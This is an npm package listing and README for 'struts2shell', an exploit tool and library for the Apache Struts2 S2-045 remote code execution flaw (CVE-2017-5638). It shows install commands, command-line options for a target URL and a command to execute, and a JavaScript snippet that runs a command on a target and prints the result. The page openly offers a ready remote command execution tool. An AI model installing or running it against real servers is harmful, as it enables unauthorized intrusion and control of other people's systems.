struts2shell
v1.0.0
Published
An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.
Downloads
8
Readme
Struts2Shell
An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.
Installation
$ npm install -g struts2shell
Installation as Library
$ npm install struts2shell
Command Line Options
-h, --help output usage information
-V, --version output the version number
-u, --url [target] URL to Attack
-c, --cmd [command] Command to Execute
Usage as Library
var Struts2Shell = require('struts2shell');
Struts2Shell({
URL: 'http://example.com/some.action',
CMD: 'dir'
}, function(err, response,body) {
if(err) throw err;
console.log(body)
})
Screenshot
License
MIT
Free Software, Hell Yeah!